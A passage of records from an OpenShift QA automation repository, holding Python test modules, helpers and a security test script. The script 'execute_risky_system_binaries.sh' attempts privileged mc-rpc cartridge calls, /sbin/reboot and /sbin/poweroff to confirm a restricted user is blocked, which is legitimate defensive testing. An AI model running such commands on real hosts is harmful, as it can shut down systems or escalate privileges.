0.48075973987579346, "alphanum_fraction": 0.48865318298339844, "avg_line_length": 38.735294342041016, "blob_id": "5e968406dc9ea71b1fcc7b1f9b86b9b7277358c3", "content_id": "bad63068be8010d6bc7813011a81d69bdd9753cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4054, "license_type": "no_license", "max_line_length": 97, "num_lines": 102, "path": "/automation/open/testmodules/RT/c9/create_app_with_subaccount.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#\n# File name: create_app_with_subaccount.py\n# Date: 2012/08/31 13:49\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.info(\"create_app_with_subaccount.py\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.sub_account = common.getRandomString(10)+\"@redhat.com\"\n self.sub_domain = common.getRandomString(10)\n self.app_name = common.getRandomString(10)\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass CreateAppWithSubaccount(OpenShiftTest):\n def test_method(self):\n self.info(\"Setting up C9 environment\")\n ret = common.setup_c9_environment()\n self.assert_equal(ret, 0, \"Error during setup C9 environment\")\n ############################################\n ############################################\n self.info(\"Creating a sub domain\")\n ret = common.create_subdomain(self.sub_domain,\n self.sub_account,\n self.user_email,\n self.user_passwd)\n self.assert_equal(ret, 0, \"Error during create subaccount/subdomain\")\n ############################################\n ############################################\n self.info(\"Adding ssh key for subaccount\")\n (ret, output) = common.add_sshkey4sub_account(self.sub_account)\n self.assert_equal(0, ret, \"Unable to add sshkey for subaccount:%s\"%output)\n ############################################\n ############################################\n self.info(\"Creating an app under sub_account[%s]\"%self.sub_account)\n (ret, app_output) = common.create_app_using_subaccount(self.sub_domain,\n self.sub_account,\n self.app_name,\n common.app_types[self.test_variant],\n self.user_email,\n self.user_passwd)\n self.assert_equal(ret, 0, \"Error creating app under subaccount/subdomain: %s\"%app_output)\n ############################################\n ############################################\n self.info(\"Getting source by git clone\")\n cmd = \"git clone %s \"%(app_output['data']['git_url'])\n (status, output) = common.command_getstatusoutput(cmd, quiet=True)\n self.assert_equal(0, status, \"Unable to do git clone...%s\"%output)\n ############################################\n ############################################\n self.info(\"SSH to the app\")\n cmd = \"ssh %s ls -l\"%(app_output['data']['ssh_url'].replace(\"ssh://\",\"\"))\n (status, output) = common.command_getstatusoutput(cmd, quiet=True)\n self.assert_equal(0, status, \"Unable to ssh to app...%s\"%output)\n self.assert_true((output.find(self.test_variant) >= 0), \"Unable to ssh to the app.\")\n ############################################\n ############################################\n self.info(\"Checking app's web page\")\n url = app_output['data']['app_url']\n status = common.grep_web_page(url, \"OpenShift\")\n self.assert_equal(0, status, \"Error checking app's web page.\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateAppWithSubaccount)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of create_app_with_subaccount.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5929408073425293, "alphanum_fraction": 0.601187527179718, "avg_line_length": 34.046241760253906, "blob_id": "88d8439366428a8db908bf45f9519af73c63b373", "content_id": "0c1615c95c65fcea37b9c9ae2beb21468459f1f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6063, "license_type": "no_license", "max_line_length": 96, "num_lines": 173, "path": "/automation/open/lib/setup_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#\n# Helper script for updating RHC clients based on OS\n#\n# [email protected]\n#\n\nimport os\nimport sys\nimport re\nimport fcntl\nfrom helper import *\n\n\nBASE_REPO_HOST='https://mirror.openshift.com/'\nURL = { \"gem\": {\"candidate\": \"/libra/rhel-6-libra-candidate/client/gems/\",\n \"stage\": \"/libra/rhel-6-libra-stage/client/gems/\"},\n \"yum\": {\"candidate\": \"/libra/rhel-6-libra-candidate/x86_64/Packages/\",\n \"stage\": \"/libra/rhel-6-libra-stage/x86_64/Packages/\"}}\nCERT=os.environ['RHTEST_HOME']+'/etc/client-cert.pem'\nKEY=os.environ['RHTEST_HOME']+'/etc/client-key.pem'\n\nCONFIG={\n \"Fedora18\": 'gem',\n \"Fedora17\": 'gem',\n \"Debian\": 'gem',\n \"Ubuntu\": 'gem',\n \"Fedora16\": 'yum',\n \"RedHat\": 'yum'}\n\nif os.getuid() == 0:\n need_sudo=\"\"\nelse:\n need_sudo=\"sudo\"\n\n\ndef fetch_rhc_client_file(file_name, branch):\n if file_name.endswith(\".gem\"):\n method = \"gem\"\n elif file_name.endswith(\".rpm\"):\n method = \"yum\"\n url = BASE_REPO_HOST + URL[method][branch] + file_name\n dst_file = os.path.expanduser(\"~/%s\" % (file_name))\n cmd = 'curl -3 -f -# -k --cert %s --key %s %s --output %s'%(CERT, KEY, url, dst_file)\n attempts=3\n log.info(\"Fetching %s from branch %s\" % (file_name, branch))\n for a in range(0,attempts):\n (status, output) = cmd_get_status_output(cmd, quiet=True)\n\n if status!=0:\n continue\n else:\n break\n if status!=0:\n log.error(\"CMD=\"+cmd)\n log.error(output)\n return (status, dst_file)\n\ndef install_rhc_client_file(file_name):\n if not os.path.exists(file_name):\n raise Exception(\"client file %s doesn't exist\"%file_name)\n log.info(\"Going to install %s\" % (file_name))\n if file_name.endswith(\".gem\"):\n _gem_install_rhc_client_file(file_name)\n elif file_name.endswith(\".rpm\"):\n _yum_install_rhc_client_file(file_name)\n\ndef _gem_install_rhc_client_file(file_name):\n if detect_os() in (\"Ubuntu\", \"Debian\"):\n cmd = \"%s gem uninstall -ax rhc ; %s gem install %s\" % (need_sudo, need_sudo, file_name)\n else:\n cmd = \"gem uninstall -ax rhc ; gem install %s\" % (file_name)\n (status, output) = cmd_get_status_output(cmd)\n if status == 0:\n log.info(\"rhc client gem file %s successfully installed\" % (file_name))\n else:\n log.info(output)\n return status\n\ndef _yum_install_rhc_client_file(file_name):\n global need_sudo\n cmd = \"%s yum remove -y rhc ; %s yum localinstall -y %s\" % (need_sudo, need_sudo, file_name)\n (status, output) = cmd_get_status_output(cmd)\n if status == 0:\n log.info(\"rhc client rpm file %s successfully installed\" % (file_name))\n else:\n log.info(output)\n return status\n\n\ndef _yum_install_rhc_client_from_repo():\n global need_sudo\n cmd = \"rpm -q rhc && %s yum update -y rhc || %s yum install -y rhc\" % (need_sudo, need_sudo)\n (status, output) = cmd_get_status_output(cmd)\n if status == 0:\n log.info(\"rhc client is successfully installed\")\n else:\n log.info(output)\n return status\n\ndef get_current_rhc_version():\n cmd = \"rhc --version\"\n (status, output) = cmd_get_status_output(cmd)\n if status == 0:\n match = re.search(r'(?<=rhc )[\\d\\.]+', output)\n if match:\n return match.group(0)\n else:\n log.error(\"Failed to get the current version of rhc client in the output\")\n log.error(output)\n return None\n else:\n log.info(\"rhc client isn't installed\")\n return None\n\ndef get_latest_rhc_release(branch):\n method = CONFIG[detect_os()]\n log.info(\"Finding latest client version from %s...\"%(branch))\n url = BASE_REPO_HOST + URL[method][branch]\n cmd = 'curl -3 --retry 3 -f -# -k --cert %s --key %s %s'%(CERT, KEY, url)\n (status, output) = cmd_get_status_output(cmd, quiet=True)\n if status!=0:\n raise Exception(\"Unable to get the list of rhc: %s\"%output)\n latest_version = [0,0,0]\n pattern = re.compile(r'(?<=<a href=\")rhc-(\\d+)\\.(\\d+)\\.(\\d+).*?(\\.gem|\\.rpm)')\n for match in pattern.finditer(output):\n for i in range(3):\n if int(match.group(i+1)) > latest_version[i]:\n latest_version = [int(match.group(1)), int(match.group(2)), int(match.group(3))]\n if latest_version == [0,0,0]:\n raise Exception(\"Failed to get the latest version of rhc client\")\n latest_version = map(str, latest_version)\n return '.'.join(latest_version)\n\ndef get_rhc_filename_by_release(release, branch):\n method = CONFIG[detect_os()]\n url = BASE_REPO_HOST + URL[method][branch]\n cmd = 'curl -3 --retry 3 -f -# -k --cert %s --key %s %s'%(CERT, KEY, url)\n (status, output) = cmd_get_status_output(cmd, quiet=True)\n if status!=0:\n raise Exception(\"Unable to get the list of rhc: %s\"%output)\n if release == None:\n release = get_latest_rhc_release(branch)\n pattern = re.compile(r'(?<=<a href=\")rhc-%s.*?(\\.gem|\\.rpm)' % (release))\n match = pattern.search(output)\n if match:\n return match.group(0)\n else:\n raise Exception(\"Failed to get rhc client file name\")\n\n\ndef do_setup(release, branch, yum_install):\n log.info(\"release: %s, branch: %s\" % (release, branch))\n current_version = get_current_rhc_version()\n if yum_install:\n return _yum_install_rhc_client_from_repo()\n\n if release == None:\n log.info(\"No rhc version specified. Going to use the latest one\")\n target_version = get_latest_rhc_release(branch)\n else:\n target_version = release\n if current_version == target_version:\n log.info(\"The required rhc client %s has already been installed\" % (target_version))\n return 0\n else:\n file_name = get_rhc_filename_by_release(target_version, branch)\n (status, file_path) = fetch_rhc_client_file(file_name, branch)\n if status != 0:\n raise Exception(\"Failed to fetch rhc file. Version: %s\" % (target_version))\n else:\n install_rhc_client_file(file_path)\n return 0\n" }, { "alpha_fraction": 0.6510903239250183, "alphanum_fraction": 0.6619937419891357, "avg_line_length": 15.461538314819336, "blob_id": "040ffc52d5dfbf361443c191a1ebcaea364e88c0", "content_id": "efdc5a99f914e6757c3fa13ec4f5ddf6be4b334b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 642, "license_type": "no_license", "max_line_length": 43, "num_lines": 39, "path": "/automation/open/testmodules/Collections/Demo/demo_03.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\nimport time\n\nimport random\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n self.msg = self.config.msg\n\n def finalize(self):\n pass\n\n\nclass Demo03(OpenShiftTest):\n def test_method(self):\n self.info(\"This is demo03\")\n time.sleep(3)\n return self.passed(\"test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo03)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5314861536026001, "alphanum_fraction": 0.5390428304672241, "avg_line_length": 18.850000381469727, "blob_id": "42d2499cb4a4878198930680176c497f4962cf74", "content_id": "f60c800c47f5e00f811c06a8cdbfadbdd6d98369", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 794, "license_type": "no_license", "max_line_length": 81, "num_lines": 40, "path": "/automation/open/lib/Common/File.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n\"\"\"\nimport re\n\n\ndef write(fpath, content, flags='w'):\n fp = open(fpath, flags)\n fp.write(content)\n fp.close()\n\n\ndef append(fpath, content):\n write(fpath, \"\\n\"+content, 'a')\n\n\ndef read(fpath):\n f = open(fpath, 'r')\n c = f.read()\n f.close()\n return c\n\n\ndef sub(fpath, pattern2repl, count=0, flags=0):\n \"\"\"\n Usage: \n fpath - path to the file for substitution\n pattern2repl - dict of { 'pattern' : ' repl', ...} format\n count,flags -see re.sub for more\n\n try:\n sub(\"/etc/passwd\", {\"^root.*\":\"#root\", \".*pattern$\",\"replacement\",...})\n except:\n ...\n\n Throws exception if error.\n \"\"\"\n c = read(fpath)\n for p in pattern2repl.keys():\n c = re.sub(p, pattern2repl[p], count, flags)\n write(fpath, c)\n" }, { "alpha_fraction": 0.6215329766273499, "alphanum_fraction": 0.6450939178466797, "avg_line_length": 21.192052841186523, "blob_id": "c7c1b3fa582cb248e18db850e67a0492d40b19b3", "content_id": "8a78e70b42207623a836b7351ed68ecb7b38d79a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3353, "license_type": "no_license", "max_line_length": 189, "num_lines": 151, "path": "/automation/open/testmodules/RT/security/data/execute_risky_system_binaries.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\nuser_home=$(env | grep HOME | cut -d= -f2)\necho \"User Home Directory: $user_home\"\nuser_name=$(basename $user_home)\necho \"User name: $user_name\"\nuser_id=$(id -u $user_name)\necho \"User ID: $user_id\"\nlibra_version=$(/bin/rpm -qa | grep rhc)\necho \"Libra Verison on node: \"\necho \"$libra_version\"\necho \"\"\necho \"\"\necho \"\"\n\necho \"###Test Case 1###: Security - Execute risky system binaries\"\ncommand=\"ps -ef\"\necho \"Command: $command\"\n$command\ncommand1=\"ps -ef --no-headers | grep -v $user_id\"\necho \"Command1: $command1\"\neval \"$command1\"\ncommand1_ret=$?\necho \"Command 1 return $command1_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand2=\"/usr/sbin/mc-ping\"\necho \"Command2: $command2\"\n$command2 >./temp.log 2>&1\ntmp_ret=$?\ncat ./temp.log\necho \"Return $tmp_ret\"\ncommand=\"cat ./temp.log | grep 'ip-'\"\necho \"Command: $command\"\neval \"$command\"\ncommand2_ret=$?\necho \"Command 2 return $command2_ret\"\necho \"\"\necho \"\"\necho \"\"\n\nssh_pub_key='AAAAB3NzaC1yc2EAAAADAQABAAABAQDcjvxtCN9CGLk/BUXe7wo/LL+5cguYQbwe3o4gfQnu7gBHjMhxs1I1/J6c3E52sMN+83/LUb/CuKAuV9lzG5fOkbNxps6F0RqzEqvSH3UF7qdCgBZJx19Xyo+YQfd8eVnM3honLira+i/PiqRmMr0yrryqa5qNqreL52hVguQ0vFC7vJX6Nbg52mmFfZvyXG8ksrC3H+zpMT5FHq6MoxWqU3jCxQ4rpJZqM2VZ7xSpU/7wKevUK345CbwRfGSPsr6M1tkaaAhOoAYJrC3U0si+JFc6hS2OTFD9QmjYAWS0NvibbFPT3SOKzEm9U5GQDzlEIr33KNwAQmv1ZjTcWjZh'\nfake_uuid=$(uuidgen |sed 's/-//g')\nfake_email=\"[email protected]\"\nfake_app=\"fakeapp\"\nfake_namespace=\"fakeuser\"\n\ncommand3=\"/usr/sbin/mc-rpc --agent libra --action cartridge_do --arg cartridge=li-controller-0.1 --arg action=configure --arg args=\\\"-c ${fake_uuid} -e ${fake_email} -s ${ssh_pub_key} -d\\\"\"\necho \"Command3: $command3\"\neval \"$command3\"\ntmp_ret=$?\necho \"Return $tmp_ret\"\ncommand=\"grep $fake_uuid /etc/passwd\"\necho \"Command: $command\"\n$command\ncommand3_ret=$?\necho \"Command3 return $command3_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand4=\"/usr/sbin/mc-rpc --agent libra --action cartridge_do --arg cartridge=php-5.3 --arg action=configure --arg args=\\\"${fake_app} ${fake_namespace} ${user_name}\\\"\"\necho \"Command4: $command4\"\neval \"$command4\"\ntmp_ret=$?\necho \"Return $tmp_ret\"\necho \"ps -ef output:\"\nps -ef\ncommand=\"ps -ef | grep -v grep | grep $fake_app\"\necho \"Command: $command\"\neval \"$command\"\ncommand4_ret=$?\necho \"Command 4 return $command4_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n \n\ncommand5=\"/usr/sbin/mc-rpc --agent libra --action cartridge_do --arg cartridge=php-5.3 --arg action=deconfigure --arg args=\\\"${fake_app} ${fake_namespace} ${user_name}\\\"\"\necho \"Command5: $command5\"\nif [ X\"$command4_ret\" == X\"0\" ]; then\n eval \"$command5\"\n tmp_ret=$?\n echo \"Return $tmp_ret\"\n echo \"ps -ef output:\"\n ps -ef\n command=\"ps -ef | grep -v grep | grep $fake_app\"\n echo \"Command: $command\"\n eval \"$command\"\n command_ret=$?\n if [ X\"$command_ret\" == X\"0\" ]; then\n command5_ret=1\n else\n command5_ret=0\n fi\nelse\n echo \"Skipping command 5 due to dependent command 4 failed, and assume it return 1\"\n command5_ret=1\nfi\necho \"Command 5 return $command5_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n\ncommand6=\"/sbin/reboot\"\necho \"Command 6: $command6\"\neval \"$command6\"\ncommand6_ret=$?\necho \"Command 6 return $command6_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand7=\"/sbin/poweroff\"\necho \"Command 7: $command7\"\neval \"$command7\"\ncommand7_ret=$?\necho \"Command 7 return $command7_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand8=\"/bin/rpm -qa | grep rhc\"\necho \"Command: $command8\"\neval \"$command8\"\ncommand8_ret=$?\necho \"Command 8 return $command8_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n\nfor i in {1..8}; do \n eval ii=\"$\"command${i}_ret\n echo \"Command ${i} result: $ii\"\n if [ X\"$ii\" == X\"0\" ]; then \n result=\"FAIL\"\n break\n else \n result=\"PASS\"\n fi\ndone\n\n\necho \"###RESULT###: ${result}\"\necho \"\"\necho \"\"\necho \"\"\n\n\n" }, { "alpha_fraction": 0.7028753757476807, "alphanum_fraction": 0.7348242998123169, "avg_line_length": 33.77777862548828, "blob_id": "8f1acec95d7dc08439cecb3b5be73640900ad670", "content_id": "bbfa2ac59ca78968f547c7b7473bce9a54d37beb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 76, "num_lines": 9, "path": "/automation/p360test.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\n\ndriver = webdriver.Firefox()\n\ndriver.get('https://p360-devel.englab.nay.redhat.com/portal/public/p360')\n\n#text = driver.find_element_by_css_selector(\".content:nth-child(2) h2\").text\ntext = driver.execute_script(\"return $('.content:nth-child(2) h2')\").text\nprint \"seeessss: \", text\n" }, { "alpha_fraction": 0.5421234965324402, "alphanum_fraction": 0.5438545942306519, "avg_line_length": 38.3863639831543, "blob_id": "e42b5fdbf4cf15497709cc1bb74c51eb681f732f", "content_id": "f562b8e2854dc53d5ab5607ad56d228f83dfb5d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3466, "license_type": "no_license", "max_line_length": 211, "num_lines": 88, "path": "/automation/open/testmodules/RT/client/rhc_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport common\nimport rhtest\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.get_variant()\n except:\n print \"OPENSHIFT_test_name environment variable is not set. Running test with default php\"\n self.test_variant = 'php'\n self.app_type = common.app_types[self.test_variant]\n self.app_name = 'my%s%s' % (self.test_variant, common.getRandomString() )\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%self.app_name)\n\n\nclass RhcApp(OpenShiftTest):\n def test_method(self):\n self.info(\"[US1317][UI][CLI]rhc wrapper - rhc app\")\n\n self.add_step(\"Help\",\n \"rhc app --help\",\n expect_description = \"Command line option --help should provide the appropriate help message\",\n expect_str = [\n \"List of Actions\", \"\\s+create\",\n \"\\s+git-clone\", \"\\s+delete\", \"\\s+start\", \"\\s+stop\", \"\\s+restart\", \"\\s+reload\", \"\\s+status\",\n \"\\s+force-stop\", \"\\s+tidy\", \n \"Global Options\", \"-l|--rhlogin\", \"-p|--password\", \n \"--noprompt\", \"-d|--debug\", \"-h|--help\", \"--config\", \"--timeout\", \n ])\n # Covering the full application life cycle\n for action in [ \"create\", \"start\", \"stop\", \"force-stop\", \"restart\", \"reload\", \"show\", \"tidy\", \"delete\"]:\n # Special parameters for some of the commands\n extra_options = \"\"\n if action == \"add-alias\" or action == \"remove-alias\":\n extra_options = \"--alias www.example.com\"\n elif action == \"create\":\n extra_options = \"-t %s\" % ( self.app_type )\n elif action == \"delete\":\n extra_options = \"--confirm\"\n elif action.startswith(\"snapshot\"):\n extra_options = \"--filepath=/tmp/%s.tar.gz\" % ( self.app_name )\n \n # Actions are tested with failure and success\n for result in [ \"success\", \"failure\"]:\n extra_options_suffix = \"\"\n app_name_suffix = \"\"\n if result == \"success\":\n return_value_expected = 0\n elif result == \"failure\":\n return_value_expected = \"!0\"\n if action == \"create\":\n extra_options_suffix = common.getRandomString()\n else:\n app_name_suffix = common.getRandomString()\n self.add_step(\"Action '%s' - %s\" % ( action, result.upper() ),\n \"rhc app %s -a %s%s -l %s -p %s %s%s %s\" % ( action, self.app_name, app_name_suffix, self.user_email, self.user_passwd, extra_options, extra_options_suffix, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = \"The action is performed with %s\" % ( result ),\n expect_return = return_value_expected)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5601145029067993, "alphanum_fraction": 0.5639312863349915, "avg_line_length": 30.28358268737793, "blob_id": "bfcda41985651251c81c9b1328a6e1f5a22cfb78", "content_id": "99fc9e193b6daa7a0004a9bb85c3b9dc1ea16db1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2096, "license_type": "no_license", "max_line_length": 116, "num_lines": 67, "path": "/automation/open/testmodules/RT/cartridge/mysql_without_password.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n\"\"\"\n\nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n test_variant = \"php\"\n self.app_type = common.app_types[test_variant]\n self.app_name = 'my%s%s' % ( test_variant, common.getRandomString(5) )\n\n common.env_setup()\n self.info(\"[US1848][runtime][rhc-cartridge] Access embeded mysql server from shell without typing password\")\n\n def finalize(self):\n pass\n\n\nclass MysqlWithoutPassword(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Creating an application\",\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False],\n expect_description = \"The application must be created successfully\",\n expect_return = 0)\n\n self.add_step(\"Embedding MySQL cartridge\",\n common.embed,\n function_parameters = [ self.app_name, \n \"add-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"MySQL cartridge must be embedded successfully\",\n expect_return = 0)\n\n self.add_step(\"Accessing remote MySQL console\",\n common.rhcsh,\n function_parameters = [ self.app_name, \n [ ( 'sendline', 'mysql'), ( 'expect', 'mysql> ') ] ],\n expect_description = \"The console must be accessible without password\",\n expect_return = 0)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MysqlWithoutPassword)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5772851705551147, "alphanum_fraction": 0.581536591053009, "avg_line_length": 34.78804397583008, "blob_id": "57cb034592f6fffee761f0f310b21c0711bd40af", "content_id": "d6a03316a9930602ab26af69ae9a98929d30d22e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6586, "license_type": "no_license", "max_line_length": 238, "num_lines": 184, "path": "/automation/open/lib/common/rest.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from consts import *\nfrom misc import *\nimport time, os, re\nimport OSConf\nimport openshift #rest api\nimport shutil\n\n#\n# All of the rest helpers as alternatives to rhc-client functionalities\n#\n\ndef create_app2(app_name, app_type, user_email=None, user_passwd=None, \n clone_repo=True, git_repo=\"./\", scalable=False, \n gear_size = \"small\", disable_autoscaling=True):\n \"\"\"Similar as craate_app but with using REST API\"\"\"\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n if scalable:\n scalable = 'true'\n else:\n scalable = 'false'\n\n (status, response) = rest.app_create_scale(app_name, app_type, scalable)\n if status in ('Created', 'OK'):\n OSConf.setup_by_rest()\n if clone_repo:\n git_clone_app(app_name)\n return 0\n else:\n return 1\n\n\ndef destroy_app2(app_name, user_email=None, user_passwd=None, clean_repo=False, git_repo=\"./\"):\n \"\"\"REST variant of destro_app\"\"\"\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n rest.app_delete(app_name)\n\n if clean_repo == True and os.path.exists(git_repo):\n shutil.rmtree(git_repo)\n\n OSConf.remove_app(app_name)\n\n\ndef create_scalable_app2(app_name, app_type, user_email=None, user_passwd=None, \n clone_repo=True, git_repo=\"./\", gear_size=\"small\", \n disable_autoscaling=True):\n \"\"\"Create app with REST API\"\"\"\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, response) = rest.app_create_scale(app_name, app_type)\n if status in ('OK', 'Created'):\n OSConf.setup_by_rest()\n if clone_repo:\n git_clone_app(app_name)\n if disable_autoscaling:\n if clone_repo:\n touch(os.path.join(app_name,\".openshift/markers/disable_auto_scaling\"))\n cmd = \"cd %s && git add . && git commit -amt && git push\" % (app_name)\n log.debug(\"Disabling autoscaling...\")\n (retcode, output) = command_getstatusoutput(cmd, quiet = True)\n if retcode != 0:\n log.error(\"Unable to disable autoscaling: %s\"%output)\n else:\n log.warning(\"Unable to disable autoscaling->disabled clone_repo\")\n else:\n log.error(response)\n if status in ('OK', 'Created'):\n return 0\n else:\n return 1\n\n\ndef scale_up(app_name, domain_name=None, user_email=None, user_passwd=None):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, resp) = rest.app_scale_up(app_name)\n import json\n jresp = json.loads(resp)\n if status == 'OK':\n return 0\n elif jresp['status'] == \"unprocessable_entity\":\n return 2\n else:\n log.error(resp)\n return 1\n '''\n if domain_name is None:\n domain_name = get_domain_name()\n cmd = 'curl -d nolinks=1 -s -3 -k -H \"Accept: application/json\" --user \"%s:%s\" https://%s/broker/rest/domains/%s/applications/%s/events -X POST -d event=scale-up'%(user_email, user_passwd, get_instance_ip(), domain_name, app_name),\n (status, output) = command_getstatusoutput(cmd, quiet=True)\n try:\n jjson = json.loads(output)\n except:\n print \"ERROR!\", output\n return 1\n if status == 0 and jjson['status'] in ('ok'):#$\"Application event 'scale-up' successful\" in output:\n print \"Application has successfull scaled up\"\n return 0\n else:\n print output\n print \"Failed to scale up the app\"\n return 1\n '''\n\n\ndef scale_down(app_name, domain_name=None, user_email=None, user_passwd=None):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, resp) = rest.app_scale_down(app_name)\n import json\n jresp = json.loads(resp)\n if status == 'OK':\n return 0\n elif jresp['status'] == \"unprocessable_entity\":\n return 2\n else:\n log.error(resp)\n return 1\n '''\n if domain_name is None:\n domain_name = get_domain_name()\n cmd = 'curl -d nolinks=1 -s -3 -k -H \"Accept: application/json\" --user \"%s:%s\" https://%s/broker/rest/domains/%s/applications/%s/events -X POST -d event=scale-down'%(user_email, user_passwd, get_instance_ip(), domain_name, app_name),\n (status, output) = command_getstatusoutput(cmd, quiet=True)\n try:\n jjson = json.loads(output)\n except:\n print \"ERROR!\",output\n return 1\n\n if status == 0 and jjson['status'] in ('ok'):#and \"Application event 'scale-down' successful\" in output:\n print \"Application has successfull scaled down\"\n return 0\n else:\n print output\n print \"Failed to scale down the app\"\n return 1\n '''\n\n\ndef get_application_template_uuid(name):\n \"\"\"\n Return application template's UUID\n \"\"\"\n (user, passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), user=user, passwd=passwd)\n (status, resp) = rest.app_templates()\n if status == 'OK':\n for t in rest.rest.response.json['data']:\n if t[\"display_name\"] == name:\n return t[\"uuid\"]\n else:\n log.error(\"%s,%s\"%(status, raw))\n return None\n log.error(\"Unable to find given template\")\n return None\n\n\ndef create_app_using_template(app_name, template_tag):\n template_uuid = get_application_template_uuid(template_tag)\n log.debug(template_uuid)\n (user, passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), user=user, passwd=passwd)\n (status, resp) = rest.app_create(app_name, 'template', template_uuid=template_uuid )\n if status == 'OK':\n return 0\n else:\n return 1\n\n" }, { "alpha_fraction": 0.5590289235115051, "alphanum_fraction": 0.5680080056190491, "avg_line_length": 36.12345504760742, "blob_id": "b52131327a9c3bb46aef090ad594fca04bab2011", "content_id": "ff21651a516649bf8fc300a6fe6a78ec70a95eb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3007, "license_type": "no_license", "max_line_length": 166, "num_lines": 81, "path": "/automation/open/testmodules/RT/cartridge/jenkins_and_user_not_logged_in.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": 